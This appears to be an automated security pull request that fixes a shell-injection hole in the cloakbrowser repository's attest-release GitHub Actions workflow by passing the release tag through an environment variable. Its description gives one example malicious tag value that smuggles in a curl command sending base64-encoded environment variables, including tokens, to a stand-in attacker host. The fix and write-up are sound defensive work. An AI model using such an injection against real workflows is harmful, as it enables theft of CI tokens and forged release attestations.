### PR TITLE
fix(security): isolate workflow_dispatch input to avoid shell injection in attest-release

### DIFF
--- a/.github/workflows/attest-release.yml
+++ b/.github/workflows/attest-release.yml
@@ -16,9 +16,10 @@ jobs:
       contents: write      # Download release assets
     steps:
       - name: Download release binaries
-        run: gh release download ${{ github.event.inputs.tag }} --repo CloakHQ/cloakbrowser --pattern "cloakbrowser-*.tar.gz" --pattern "cloakbrowser-*.zip"
+        run: gh release download "$RELEASE_TAG" --repo CloakHQ/cloakbrowser --pattern "cloakbrowser-*.tar.gz" --pattern "cloakbrowser-*.zip"
         env:
           GH_TOKEN: ${{ github.token }}
+          RELEASE_TAG: ${{ github.event.inputs.tag }}
 
       - name: Attest build provenance
         uses: actions/attest-build-provenance@a2bbfa25375fe432b6a289bc6b6cd05ecd0c4c32  # v4.1.0


### PR DESCRIPTION
## Summary

`.github/workflows/attest-release.yml` interpolated the `workflow_dispatch` input directly into a shell command, which is the [GitHub-flagged shell-injection sink](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections). Move the input through an intermediate `env:` variable so the value cannot be re-parsed by the shell.

## Impact

Workflow scope:

```yaml
permissions:
  id-token: write      # Sigstore OIDC
  attestations: write  # GitHub attestation API
  contents: write      # Download release assets
```

A caller able to dispatch this workflow (limited to repo collaborators) could pass a tag value containing shell metacharacters — e.g. `chromium-v145.0.7632.159.2"; curl evil.example/$(env | base64) #` — and the runner would execute the injected command alongside the intended `gh release download`. With `contents: write`, `attestations: write`, and a valid `GH_TOKEN` in the environment, the blast radius includes:

- exfiltration of the workflow's `GH_TOKEN` and OIDC token
- arbitrary release-asset modification on the `CloakHQ/cloakbrowser` mirror
- forging build-provenance attestations for arbitrary file contents

`workflow_dispatch` does require repo-write to trigger, so the realistic threat models are (a) a compromised maintainer/collaborator account, or (b) a misconfigured permission grant. Hardening here is cheap insurance regardless.

## Location

`.github/workflows/attest-release.yml:19`

## Fix

```diff
       - name: Download release binaries
-        run: gh release download ${{ github.event.inputs.tag }} --repo CloakHQ/cloakbrowser --pattern "cloakbrowser-*.tar.gz" --pattern "cloakbrowser-*.zip"
+        run: gh release download "$RELEASE_TAG" --repo CloakHQ/cloakbrowser --pattern "cloakbrowser-*.tar.gz" --pattern "cloakbrowser-*.zip"
         env:
           GH_TOKEN: ${{ github.token }}
+          RELEASE_TAG: ${{ github.event.inputs.tag }}
```

The tag is now an environment variable bound by GitHub Actions before the shell launches, so a value containing `"`, `;`, `$(...)`, etc. is delivered as a string to `gh` instead of being interpreted as additional shell tokens.

## Detected by

Aeon + semgrep (`yaml.github-actions.security.run-shell-injection.run-shell-injection`).
- Severity: medium
- CWE-78 (OS Command Injection)

## Verification

No runtime change — `gh release download` still receives the same tag value, just routed through `$RELEASE_TAG`. The pre-existing `workflow_dispatch.inputs.tag` description (`Release tag (e.g. chromium-v145.0.7632.159.2)`) stays intact.

---

Filed by [Aeon](https://github.com/aaronjmars/aeon-aaron).